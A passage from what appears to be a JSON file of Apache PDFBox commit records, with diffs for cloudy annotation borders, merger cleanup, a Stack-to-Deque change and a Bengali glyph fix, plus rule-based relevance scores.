beginOutput(x, y);", + "+ }", + "+", + "+ output.lineTo((float)x, (float)y);", + "+ }", + "+", + "+ private void curveTo(double ax, double ay, double bx, double by, double cx, double cy)", + "+ throws IOException", + "+ {", + "+ updateBBox(ax, ay);", + "+ updateBBox(bx, by);", + "+ updateBBox(cx, cy);", + "+ output.curveTo((float)ax, (float)ay, (float)bx, (float)by, (float)cx, (float)cy);", + "+ }", + "+", + "+ private void finish() throws IOException", + "+ {", + "+ if (outputStarted)", + "+ {", + "+ output.closePath();", + "+ }", + "+", + "+ if (lineWidth > 0)", + "+ {", + "+ double d = lineWidth / 2;", + "+ bboxMinX -= d;", + "+ bboxMinY -= d;", + "+ bboxMaxX += d;", + "+ bboxMaxY += d;", + "+ }", + "+ }", + "+", + "+ private double getEllipseCloudRadius()", + "+ {", + "+ // Equation deduced from Acrobat Reader's appearance streams. Circle", + "+ // annotations have a slightly larger radius than Polygons and Squares.", + "+ return 4.75 * intensity + 0.5 * lineWidth;", + "+ }", + "+", + "+ private double getPolygonCloudRadius()", + "+ {", + "+ // Equation deduced from Acrobat Reader's appearance streams.", + "+ return 4 * intensity + 0.5 * lineWidth;", + "+ }", + "+}", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCircleAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCircleAppearanceHandler.java", + "index 4cd34e8dd..e6258467f 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCircleAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCircleAppearanceHandler.java", + "@@ -29,3 +29,5 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationCircle;", + " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceContentStream;", + "+import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceStream;", + " import org.apache.pdfbox.pdmodel.interactive.annotation.PDBorderStyleDictionary;", + "+import org.apache.pdfbox.pdmodel.interactive.annotation.PDBorderEffectDictionary;", + "@@ -68,6 +70,3 @@ public class PDCircleAppearanceHandler extends PDAbstractAppearanceHandler", + " contentStream.setBorderLine(lineWidth, annotation.getBorderStyle());", + "- ", + "- // the differences rectangle", + "- // TODO: this only works for border effect solid. Cloudy needs a different approach.", + "- setRectDifference(lineWidth);", + "+ PDBorderEffectDictionary borderEffect = annotation.getBorderEffect();", + "@@ -80,25 +79,43 @@ public class PDCircleAppearanceHandler extends PDAbstractAppearanceHandler", + "- // lower left corner", + "- float x0 = borderEdge.getLowerLeftX();", + "- float y0 = borderEdge.getLowerLeftY();", + "- // upper right corner", + "- float x1 = borderEdge.getUpperRightX();", + "- float y1 = borderEdge.getUpperRightY();", + "- // mid points", + "- float xm = x0 + borderEdge.getWidth() / 2;", + "- float ym = y0 + borderEdge.getHeight() / 2;", + "- // see http://spencermortensen.com/articles/bezier-circle/", + "- // the below number was calculated from sampling content streams", + "- // generated using Adobe Reader", + "- float magic = 0.55555417f;", + "- // control point offsets", + "- float vOffset = borderEdge.getHeight() / 2 * magic;", + "- float hOffset = borderEdge.getWidth() / 2 * magic;", + "+ if (borderEffect != null && borderEffect.getStyle().equals(PDBorderEffectDictionary.STYLE_CLOUDY))", + "+ {", + "+ CloudyBorder cloudyBorder = new CloudyBorder(contentStream,", + "+ borderEffect.getIntensity(), lineWidth, getRectangle());", + "+ cloudyBorder.createCloudyEllipse(annotation.getRectDifference());", + "+ annotation.setRectangle(cloudyBorder.getRectangle());", + "+ annotation.setRectDifference(cloudyBorder.getRectDifference());", + "+ PDAppearanceStream appearanceStream = annotation.getNormalAppearanceStream();", + "+ appearanceStream.setBBox(cloudyBorder.getBBox());", + "+ appearanceStream.setMatrix(cloudyBorder.getMatrix());", + "+ }", + "+ else", + "+ {", + "+ // the differences rectangle", + "+ setRectDifference(lineWidth);", + "+ ", + "+ // lower left corner", + "+ float x0 = borderEdge.getLowerLeftX();", + "+ float y0 = borderEdge.getLowerLeftY();", + "+ // upper right corner", + "+ float x1 = borderEdge.getUpperRightX();", + "+ float y1 = borderEdge.getUpperRightY();", + "+ // mid points", + "+ float xm = x0 + borderEdge.getWidth() / 2;", + "+ float ym = y0 + borderEdge.getHeight() / 2;", + "+ // see http://spencermortensen.com/articles/bezier-circle/", + "+ // the below number was calculated from sampling content streams", + "+ // generated using Adobe Reader", + "+ float magic = 0.55555417f;", + "+ // control point offsets", + "+ float vOffset = borderEdge.getHeight() / 2 * magic;", + "+ float hOffset = borderEdge.getWidth() / 2 * magic;", + "+ ", + "+ contentStream.moveTo(xm, y1);", + "+ contentStream.curveTo((xm + hOffset), y1, x1, (ym + vOffset), x1, ym);", + "+ contentStream.curveTo(x1, (ym - vOffset), (xm + hOffset), y0, xm, y0);", + "+ contentStream.curveTo((xm - hOffset), y0, x0, (ym - vOffset), x0, ym);", + "+ contentStream.curveTo(x0, (ym + vOffset), (xm - hOffset), y1, xm, y1);", + "+ contentStream.closePath();", + "+ }", + "- contentStream.moveTo(xm, y1);", + "- contentStream.curveTo((xm + hOffset), y1, x1, (ym + vOffset), x1, ym);", + "- contentStream.curveTo(x1, (ym - vOffset), (xm + hOffset), y0, xm, y0);", + "- contentStream.curveTo((xm - hOffset), y0, x0, (ym - vOffset), x0, ym);", + "- contentStream.curveTo(x0, (ym + vOffset), (xm - hOffset), y1, xm, y1);", + "- contentStream.closePath();", + " contentStream.drawShape(lineWidth, hasStroke, hasBackground);", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java", + "index d2ef93cdb..b07d3823c 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java", + "@@ -30,2 +30,4 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationPolygon;", + " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceContentStream;", + "+import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceStream;", + "+import org.apache.pdfbox.pdmodel.interactive.annotation.PDBorderEffectDictionary;", + " import org.apache.pdfbox.pdmodel.interactive.annotation.PDBorderStyleDictionary;", + "@@ -113,31 +115,43 @@ public class PDPolygonAppearanceHandler extends PDAbstractAppearanceHandler", + " }", + "-", + "- // the differences rectangle", + "- // TODO: this only works for border effect solid. Cloudy needs a", + "- // different approach.", + "- setRectDifference(lineWidth);", + "-", + "- // Acrobat applies a padding to each side of the bbox so the line is", + "- // completely within the bbox.", + "-", + "- for (int i = 0; i < pathArray.length; i++)", + "+ ", + "+ PDBorderEffectDictionary borderEffect = annotation.getBorderEffect();", + "+ if (borderEffect != null && borderEffect.getStyle().equals(PDBorderEffectDictionary.STYLE_CLOUDY))", + " {", + "- float[] pointsArray = pathArray[i];", + "- // first array shall be of size 2 and specify the moveto operator", + "- if (i == 0 && pointsArray.length == 2)", + "- {", + "- contentStream.moveTo(pointsArray[0], pointsArray[1]);", + "- }", + "- else", + "+ CloudyBorder cloudyBorder = new CloudyBorder(contentStream,", + "+ borderEffect.getIntensity(), lineWidth, getRectangle());", + "+ cloudyBorder.createCloudyPolygon(pathArray);", + "+ annotation.setRectangle(cloudyBorder.getRectangle());", + "+ PDAppearanceStream appearanceStream = annotation.getNormalAppearanceStream();", + "+ appearanceStream.setBBox(cloudyBorder.getBBox());", + "+ appearanceStream.setMatrix(cloudyBorder.getMatrix());", + "+ }", + "+ else", + "+ {", + "+ // the differences rectangle", + "+ setRectDifference(lineWidth);", + "+ ", + "+ // Acrobat applies a padding to each side of the bbox so the line is", + "+ // completely within the bbox.", + "+ ", + "+ for (int i = 0; i < pathArray.length; i++)", + " {", + "- // entries of length 2 shall be treated as lineto operator", + "- if (pointsArray.length == 2)", + "+ float[] pointsArray = pathArray[i];", + "+ // first array shall be of size 2 and specify the moveto operator", + "+ if (i == 0 && pointsArray.length == 2)", + " {", + "- contentStream.lineTo(pointsArray[0], pointsArray[1]);", + "+ contentStream.moveTo(pointsArray[0], pointsArray[1]);", + " }", + "- else if (pointsArray.length == 6)", + "+ else", + " {", + "- contentStream.curveTo(pointsArray[0], pointsArray[1],", + "- pointsArray[2], pointsArray[3],", + "- pointsArray[4], pointsArray[5]);", + "+ // entries of length 2 shall be treated as lineto operator", + "+ if (pointsArray.length == 2)", + "+ {", + "+ contentStream.lineTo(pointsArray[0], pointsArray[1]);", + "+ }", + "+ else if (pointsArray.length == 6)", + "+ {", + "+ contentStream.curveTo(pointsArray[0], pointsArray[1],", + "+ pointsArray[2], pointsArray[3],", + "+ pointsArray[4], pointsArray[5]);", + "+ }", + " }", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquareAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquareAppearanceHandler.java", + "index aeb9edf60..31c295432 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquareAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquareAppearanceHandler.java", + "@@ -31,2 +31,4 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationSquare;", + " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceContentStream;", + "+import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceStream;", + "+import org.apache.pdfbox.pdmodel.interactive.annotation.PDBorderEffectDictionary;", + " import org.apache.pdfbox.pdmodel.interactive.annotation.PDBorderStyleDictionary;", + "@@ -70,29 +72,14 @@ public class PDSquareAppearanceHandler extends PDAbstractAppearanceHandler", + " contentStream.setBorderLine(lineWidth, annotation.getBorderStyle()); ", + "+ PDBorderEffectDictionary borderEffect = annotation.getBorderEffect();", + "- // handle the border box", + "- // ", + "- // There are two options. The handling is not part of the PDF specification but", + "- // implementation specific to Adobe Reader", + "- // - if /RD is set the border box is the /Rect entry inset by the respective", + "- // border difference.", + "- // - if /RD is not set the border box is defined by the /Rect entry. The /RD entry will", + "- // be set to be the line width and the /Rect is enlarged by the /RD amount", + "-", + "- PDRectangle borderBox = null;", + "- float[] rectDifferences = annotation.getRectDifferences();", + "- ", + "- if (rectDifferences.length == 0)", + "+ if (borderEffect != null && borderEffect.getStyle().equals(PDBorderEffectDictionary.STYLE_CLOUDY))", + " {", + "- borderBox = getPaddedRectangle(getRectangle(), lineWidth/2);", + "- // the differences rectangle", + "- // TODO: this only works for border effect solid. Cloudy needs a different approach.", + "- annotation.setRectDifferences(lineWidth/2);", + "- annotation.setRectangle(addRectDifferences(getRectangle(), annotation.getRectDifferences()));", + "- ", + "- // when the normal appearance stream was generated BBox and Matrix have been set to the", + "- // values of the original /Rect. As the /Rect was changed that needs to be adjusted too.", + "- annotation.getNormalAppearanceStream().setBBox(getRectangle());", + "- AffineTransform transform = AffineTransform.getTranslateInstance(-getRectangle().getLowerLeftX(),", + "- -getRectangle().getLowerLeftY());", + "- annotation.getNormalAppearanceStream().setMatrix(transform);", + "+ CloudyBorder cloudyBorder = new CloudyBorder(contentStream,", + "+ borderEffect.getIntensity(), lineWidth, getRectangle());", + "+ cloudyBorder.createCloudyRectangle(annotation.getRectDifference());", + "+ annotation.setRectangle(cloudyBorder.getRectangle());", + "+ annotation.setRectDifference(cloudyBorder.getRectDifference());", + "+ PDAppearanceStream appearanceStream = annotation.getNormalAppearanceStream();", + "+ appearanceStream.setBBox(cloudyBorder.getBBox());", + "+ appearanceStream.setMatrix(cloudyBorder.getMatrix());", + " }", + "@@ -100,9 +87,38 @@ public class PDSquareAppearanceHandler extends PDAbstractAppearanceHandler", + " {", + "- borderBox = applyRectDifferences(getRectangle(), rectDifferences);", + "- borderBox = getPaddedRectangle(borderBox, lineWidth/2);", + "- }", + "+ // handle the border box", + "+ //", + "+ // There are two options. The handling is not part of the PDF specification but", + "+ // implementation specific to Adobe Reader", + "+ // - if /RD is set the border box is the /Rect entry inset by the respective", + "+ // border difference.", + "+ // - if /RD is not set the border box is defined by the /Rect entry. The /RD entry will", + "+ // be set to be the line width and the /Rect is enlarged by the /RD amount", + "- contentStream.addRect(borderBox.getLowerLeftX(), borderBox.getLowerLeftY(),", + "- borderBox.getWidth(), borderBox.getHeight());", + "+ PDRectangle borderBox = null;", + "+ float[] rectDifferences = annotation.getRectDifferences();", + "+ if (rectDifferences.length == 0)", + "+ {", + "+ borderBox = getPaddedRectangle(getRectangle(), lineWidth/2);", + "+ // the differences rectangle", + "+ annotation.setRectDifferences(lineWidth/2);", + "+ annotation.setRectangle(addRectDifferences(getRectangle(), annotation.getRectDifferences()));", + "+", + "+ // when the normal appearance stream was generated BBox and Matrix have been set to the", + "+ // values of the original /Rect. As the /Rect was changed that needs to be adjusted too.", + "+ annotation.getNormalAppearanceStream().setBBox(getRectangle());", + "+ AffineTransform transform = AffineTransform.getTranslateInstance(-getRectangle().getLowerLeftX(),", + "+ -getRectangle().getLowerLeftY());", + "+ annotation.getNormalAppearanceStream().setMatrix(transform);", + "+ }", + "+ else", + "+ {", + "+ borderBox = applyRectDifferences(getRectangle(), rectDifferences);", + "+ borderBox = getPaddedRectangle(borderBox, lineWidth/2);", + "+ }", + "+", + "+ contentStream.addRect(borderBox.getLowerLeftX(), borderBox.getLowerLeftY(),", + "+ borderBox.getWidth(), borderBox.getHeight());", + "+ }", + "+", + " contentStream.drawShape(lineWidth, hasStroke, hasBackground);" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/CloudyBorder.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCircleAppearanceHandler.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolygonAppearanceHandler.java", + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDSquareAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "f568c13db0a43a9b48e79be7a4cc1546a8cff6b2", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1524161446, + "hunks": 2, + "message": "PDFBOX-3999: revert two accidentally committed segments git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1829597 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java b/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", + "index 4da4e6f61..27ae233e4 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java", + "@@ -531,20 +531,2 @@ public class PDFMergerUtility", + " {", + "-// System.out.println(srcNames);", + "-// System.out.println(srcNames.getDests());", + "-// System.out.println(srcNames.getDests().getNames());", + "-// Map names1 = srcNames.getDests().getNames();", + "-// Map names2 = destNames.getDests().getNames();", + "-// if (names1 != null)", + "-// System.out.println(names1.keySet());", + "-// else", + "-// {", + "-// List> kids = srcNames.getDests().getKids();", + "-// for (PDNameTreeNode kid : kids)", + "-// {", + "-// ", + "-// System.out.println(kid.getNames().keySet());", + "-// }", + "-// ", + "-// }", + "-// System.out.println(names2.keySet());", + " cloner.cloneMerge(srcNames, destNames);", + "@@ -1003,20 +985,20 @@ public class PDFMergerUtility", + " }", + "-// else", + "-// {", + "-// // PDFBOX-3999: clone objects that are not in mapping to make sure that", + "-// // these don't remain attached to the source document", + "-// COSBase item = parentTreeEntry.getItem(COSName.OBJ);", + "-// if (item instanceof COSObject)", + "-// {", + "-// LOG.warn(\"clone potential orphan object in structure tree: \" + item +", + "-// \", type: \" + ((COSDictionary) obj).getNameAsString(COSName.TYPE));", + "-// }", + "-// else", + "-// {", + "-// // don't display because of stack overflow", + "-// LOG.warn(\"clone potential orphan object in structure tree, type: \" +", + "-// ((COSDictionary) obj).getNameAsString(COSName.TYPE));", + "-// }", + "-// parentTreeEntry.setItem(COSName.OBJ, cloner.cloneForNewDocument(obj));", + "-// }", + "+ else", + "+ {", + "+ // PDFBOX-3999: clone objects that are not in mapping to make sure that", + "+ // these don't remain attached to the source document", + "+ COSBase item = parentTreeEntry.getItem(COSName.OBJ);", + "+ if (item instanceof COSObject)", + "+ {", + "+ LOG.debug(\"clone potential orphan object in structure tree: \" + item +", + "+ \", type: \" + ((COSDictionary) obj).getNameAsString(COSName.TYPE));", + "+ }", + "+ else", + "+ {", + "+ // don't display because of stack overflow", + "+ LOG.debug(\"clone potential orphan object in structure tree, type: \" +", + "+ ((COSDictionary) obj).getNameAsString(COSName.TYPE));", + "+ }", + "+ parentTreeEntry.setItem(COSName.OBJ, cloner.cloneForNewDocument(obj));", + "+ }", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/multipdf/PDFMergerUtility.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3999": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3999", + "relevance": 2 + } + ] + }, + { + "commit_id": "4c74fff371dd8017322cd68b9aa50d73f7a70d00", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1530810951, + "hunks": 14, + "message": "PDFBOX-3353: Add clipping rect; remove \"factor\" which was just a guess; draw text in cloudy annotation as if the rectangle hadn't changed for the clouds; fix bug with /RD and non cloudy git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1835157 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", + "index 9904364b6..b9e0c9771 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", + "@@ -162,2 +162,7 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", + " {", + "+ // Adobe draws the text with the original rectangle in mind.", + "+ // but if there is an /RD, then writing area get smaller.", + "+ // do this here because /RD is overwritten in a few lines", + "+ borderBox = applyRectDifferences(getRectangle(), annotation.getRectDifferences());", + "+", + " //TODO this segment was copied from square handler. Refactor?", + "@@ -169,4 +174,3 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", + " PDAppearanceStream appearanceStream = annotation.getNormalAppearanceStream();", + "- borderBox = cloudyBorder.getBBox();", + "- appearanceStream.setBBox(borderBox);", + "+ appearanceStream.setBBox(cloudyBorder.getBBox());", + " appearanceStream.setMatrix(cloudyBorder.getMatrix());", + "@@ -182,15 +186,9 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", + " // - if /RD is not set then we don't touch /RD etc because Adobe doesn't either.", + "- float[] rectDifferences = annotation.getRectDifferences();", + "- if (rectDifferences.length == 0)", + "- {", + "- borderBox = getRectangle();", + "- }", + "- else", + "- {", + "- borderBox = applyRectDifferences(getRectangle(), rectDifferences);", + "- annotation.getNormalAppearanceStream().setBBox(borderBox);", + "- }", + "- borderBox = getPaddedRectangle(borderBox, ab.width / 2);", + "- cs.addRect(borderBox.getLowerLeftX(), borderBox.getLowerLeftY(),", + "- borderBox.getWidth(), borderBox.getHeight());", + "+ borderBox = applyRectDifferences(getRectangle(), annotation.getRectDifferences());", + "+ annotation.getNormalAppearanceStream().setBBox(borderBox);", + "+", + "+ // note that borderBox is not modified", + "+ PDRectangle paddedRectangle = getPaddedRectangle(borderBox, ab.width / 2);", + "+ cs.addRect(paddedRectangle.getLowerLeftX(), paddedRectangle.getLowerLeftY(),", + "+ paddedRectangle.getWidth(), paddedRectangle.getHeight());", + " }", + "@@ -199,3 +197,3 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", + " // rotation is an undocumented feature, but Adobe uses it. Examples can be found", + "- // in pdf_commenting_new.pdf file.", + "+ // in pdf_commenting_new.pdf file, page 3.", + " int rotation = annotation.getCOSObject().getInt(COSName.ROTATE, 0);", + "@@ -204,14 +202,13 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", + " float yOffset;", + "- float width = rotation == 90 || rotation == 270 ? borderBox.getHeight(): borderBox.getWidth();", + "- // somewhat inspired by AppearanceGeneratorHelper.insertGeneratedAppearance()", + "- cs.beginText();", + "+ float width = rotation == 90 || rotation == 270 ? borderBox.getHeight() : borderBox.getWidth();", + "+ // strategy to write formatted text is somewhat inspired by ", + "+ // AppearanceGeneratorHelper.insertGeneratedAppearance()", + " PDFont font = PDType1Font.HELVETICA;", + "- int factor = 1;", + "- if (borderEffect != null && borderEffect.getStyle().equals(PDBorderEffectDictionary.STYLE_CLOUDY))", + "- {", + "- //TODO cloudy needs to be reviewed too.", + "- factor = 2;", + "- }", + "+ float clipY;", + "+ float clipWidth = width - ab.width * 4;", + "+ float clipHeight = rotation == 90 || rotation == 270 ? ", + "+ borderBox.getWidth() - ab.width * 4 : borderBox.getHeight() - ab.width * 4;", + " float fontSize = extractFontSize(annotation);", + "- // used by Adobe, no idea where it comes from, actual font bbox max y is 0.931", + "+", + "+ // value used by Adobe, no idea where it comes from, actual font bbox max y is 0.931", + " // gathered by creating an annotation with width 0.", + "@@ -221,12 +218,15 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", + " case 180:", + "- xOffset = - borderBox.getUpperRightX() + ab.width * 2 * factor; ", + "- yOffset = - borderBox.getLowerLeftY() - ab.width * 2 * factor - yDelta * fontSize * factor;", + "+ xOffset = - borderBox.getUpperRightX() + ab.width * 2;", + "+ yOffset = - borderBox.getLowerLeftY() - ab.width * 2 - yDelta * fontSize;", + "+ clipY = - borderBox.getUpperRightY() + ab.width * 2;", + " break;", + " case 90:", + "- xOffset = borderBox.getLowerLeftY() + ab.width * 2 * factor;", + "- yOffset = - borderBox.getLowerLeftX() - ab.width * 2 * factor - yDelta * fontSize * factor;", + "+ xOffset = borderBox.getLowerLeftY() + ab.width * 2;", + "+ yOffset = - borderBox.getLowerLeftX() - ab.width * 2 - yDelta * fontSize;", + "+ clipY = - borderBox.getUpperRightX() + ab.width * 2;", + " break;", + " case 270:", + "- xOffset = - borderBox.getUpperRightY() + ab.width * 2 * factor;", + "- yOffset = borderBox.getUpperRightX() - ab.width * 2 * factor - yDelta * fontSize * factor;", + "+ xOffset = - borderBox.getUpperRightY() + ab.width * 2;", + "+ yOffset = borderBox.getUpperRightX() - ab.width * 2 - yDelta * fontSize;", + "+ clipY = borderBox.getLowerLeftX() + ab.width * 2;", + " break;", + "@@ -234,6 +234,13 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", + " default:", + "- xOffset = borderBox.getLowerLeftX() + ab.width * 2 * factor;", + "- yOffset = borderBox.getUpperRightY() - ab.width * 2 * factor - yDelta * fontSize * factor;", + "+ xOffset = borderBox.getLowerLeftX() + ab.width * 2;", + "+ yOffset = borderBox.getUpperRightY() - ab.width * 2 - yDelta * fontSize;", + "+ clipY = borderBox.getLowerLeftY() + ab.width * 2;", + " break;", + " }", + "+", + "+ // clip writing area", + "+ cs.addRect(xOffset, clipY, clipWidth, clipHeight);", + "+ cs.clip();", + "+", + "+ cs.beginText();", + " cs.setFont(font, fontSize);", + "@@ -246,5 +253,4 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", + " .text(new PlainText(annotation.getContents()))", + "- .width(width - ab.width * factor * 4)", + "+ .width(width - ab.width * 4)", + " .wrapLines(true)", + "- //TODO some reverse engineering needed to find out padding", + " .initialOffset(xOffset, yOffset)" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-3353": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-3353", + "relevance": 2 + } + ] + }, + { + "commit_id": "e5a005d1e4fd4ab91af784ecb778f708ec0dd954", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1525957062, + "hunks": 7, + "message": "PDFBOX-4071: replace the synchronized class \"Stack\" by the unsynchronized \"Deque\" git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1831334 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java", + "index 8140a4496..d85a36bce 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java", + "@@ -25,3 +25,5 @@ import java.io.OutputStream;", + " import java.text.NumberFormat;", + "+import java.util.ArrayDeque;", + " import java.util.ArrayList;", + "+import java.util.Deque;", + " import java.util.HashMap;", + "@@ -32,3 +34,2 @@ import java.util.Map;", + " import java.util.Set;", + "-import java.util.Stack;", + " import java.util.regex.Pattern;", + "@@ -83,6 +84,6 @@ abstract class PDAbstractContentStream implements Closeable", + " protected boolean inTextMode = false;", + "- protected final Stack fontStack = new Stack<>();", + "+ protected final Deque fontStack = new ArrayDeque<>();", + "- protected final Stack nonStrokingColorSpaceStack = new Stack<>();", + "- protected final Stack strokingColorSpaceStack = new Stack<>();", + "+ protected final Deque nonStrokingColorSpaceStack = new ArrayDeque<>();", + "+ protected final Deque strokingColorSpaceStack = new ArrayDeque<>();", + "@@ -172,3 +173,4 @@ abstract class PDAbstractContentStream implements Closeable", + " {", + "- fontStack.setElementAt(font, fontStack.size() - 1);", + "+ fontStack.pop();", + "+ fontStack.push(font);", + " }", + "@@ -1553,3 +1555,4 @@ abstract class PDAbstractContentStream implements Closeable", + " {", + "- strokingColorSpaceStack.setElementAt(colorSpace, strokingColorSpaceStack.size() - 1);", + "+ strokingColorSpaceStack.pop();", + "+ strokingColorSpaceStack.push(colorSpace);", + " }", + "@@ -1565,3 +1568,4 @@ abstract class PDAbstractContentStream implements Closeable", + " {", + "- nonStrokingColorSpaceStack.setElementAt(colorSpace, nonStrokingColorSpaceStack.size() - 1);", + "+ nonStrokingColorSpaceStack.pop();", + "+ nonStrokingColorSpaceStack.push(colorSpace);", + " }" + ], + "changed_files": [ + "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/PDAbstractContentStream.java" + ], + "message_reference_content": [], + "jira_refs": { + "PDFBOX-4071": "" + }, + "ghissue_refs": {}, + "cve_refs": [], + "twins": [], + "tags": [ + "3.0.0", + "3.0.0-RC1", + "3.0.0-alpha2", + "3.0.0-alpha3", + "3.0.0-beta1", + "3.0.1", + "3.0.2" + ], + "matched_rules": [ + { + "id": "CHANGES_RELEVANT_CODE", + "message": "The commit modifies code containing relevant filename or methods: PDF", + "relevance": 8 + }, + { + "id": "BUG_IN_MESSAGE", + "message": "The commit message references some bug tracking ticket: PDFBOX-4071", + "relevance": 2 + } + ] + }, + { + "commit_id": "f7969b5b3de6acc8f34454aaed73a1dfb1776076", + "repository": "https://github.com/apache/pdfbox", + "timestamp": 1524995452, + "hunks": 15, + "message": "PDFBOX-4189: Bengali fix for GSUB: ja phala not rendering properly, by Palash Ray git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1830499 13f79535-47bb-0310-9956-ffa450edef68", + "diff": [ + "diff --git a/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java b/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/BengaliPdfGenerationHelloWorld.java", + "index e1246f380..a44d464df 100644", + "--- 